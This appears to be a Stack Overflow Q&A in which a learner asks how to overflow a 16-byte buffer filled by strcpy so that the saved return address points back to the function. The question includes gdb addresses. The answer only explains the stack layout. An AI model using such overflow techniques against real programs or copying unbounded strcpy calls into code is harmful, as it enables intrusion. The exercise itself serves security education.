1

So I am trying to modify the return address of this function to make it run forever. I realize that I need to change the return address with the address of the function this way it will loop forever.

Here is the code

void win(char * arg)
{

    char name[16];
    char * stuff[4] = {"TV", "Phone", "Car", "Cash"};

    strcpy(name, arg);
    printf("Your name is %s:\n", name);
    printf("Here you can use this to win %s!\n", stuff[rand()%4]);
    printf("Here is the number %d\n\n", rand());
}

arg is just argv[1]

I used gdb to get the address of the win function, which is 0x8048530. I used the info frame command to look at saved eip (which is return address correct?) at it is 0x804862c. I believe to get to the return address I need to overflow name[]. I am guessing I can some how calculate exactly where I can insert the address of win to overwrite the return function. So something like name[23]. name[0] address is 0xbffffaa0 name[16] address is 0xbffffab0. The address of arg is 0xbffffac0. So that is all the information I know. I just am struggling putting it all together to cause the attack. Apparently if I cause name to overflow it will go into stuff, but I need to change the return address so I need to go the other way. How can I do that using a buffer overflow attack

Johsh Hanks
  • 147
  • 1
  • 3
  • 11

1 Answers1

0

By overflowing name, you'll corrupt the local variable that resides after it, stuff in this case. In order to rewrite the return address, you need to go back in the stack, not forward.

This answer has a nice sketch of stack layout.

Community
  • 1
  • 1
SomeWittyUsername
  • 18,025
  • 3
  • 42
  • 85
  • So after looking at the sketch you provided. The return address lies between arg and name[] correct? This kind of confuses me more as how I can cause an buffer overflow attack but have it go backwards – Johsh Hanks Feb 21 '14 at 16:33